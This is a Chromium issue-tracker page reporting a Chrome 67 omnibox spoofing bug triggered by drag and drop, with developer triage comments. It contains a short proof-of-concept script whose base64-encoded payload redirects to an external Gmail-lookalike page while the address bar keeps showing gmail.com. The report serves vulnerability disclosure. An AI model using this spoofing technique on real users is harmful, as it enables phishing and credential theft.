Issue metadata
Sign in to add a comment
|
Security: Chrome Omnibox Spoofing with Drag&Drop
Reported by
xis...@gmail.com,
Jul 13
|
||||||||||||||||||||||||
Issue description
VULNERABILITY DETAILS
When navigation succeeds, the Drag&Drop‘s URL is always shown in the omnibox and fails to refresh on navigation.
VERSION
Chrome Version: 67.0.3396.99+[Stable]
Operating System: [Windows]
REPRODUCTION CASE
Drag and drop links to the current TAB.
POC:
<script>
document.addEventListener("dragend", function() {
document.write(atob('PGgxPlNwb29mPC9oMT4KPHNjcmlwdD4KbG9jYXRpb249J2h0dHA6Ly94aXNpZ3IuY29tL3Rlc3QxOTk1L0dtYWlsLmh0bSc7Ci8vbG9jYXRpb249J2h0dHBzOi8vYXBwbGUuY29tJzsKPC9zY3JpcHQ+Cgo='));
document.write('<title>Google</title>');
});
</script>
<p>
Drag and drop links to the current TAB.
</p>
<a href="https://www.gmail.com/">www.gmail.com</a>
base64 decode:
<h1>Spoof</h1>
<script>
location='http://xisigr.com/test1995/Gmail.htm';
//location='https://apple.com';
</script>
,
Jul 13
(oops, hit Enter too soon) This looks identical to issue 698156 , though please do let me know if I'm missing something. We would like to do something to differentiate pending navigations from those that have committed (besides the lock icon, which is a mitigating factor in this attack), but we're not quite sure yet what to do that users will realistically notice/understand.
,
Jul 18
,
Oct 20
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
|||||||||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||||||||
Comment 1 by est...@chromium.org
, Jul 13Components: UI>Browser>Navigation UI>Browser>Omnibox
Labels: Security_Severity-Low M-70 OS-Chrome OS-Linux OS-Mac OS-Windows Pri-3
Status: Available (was: Unconfirmed)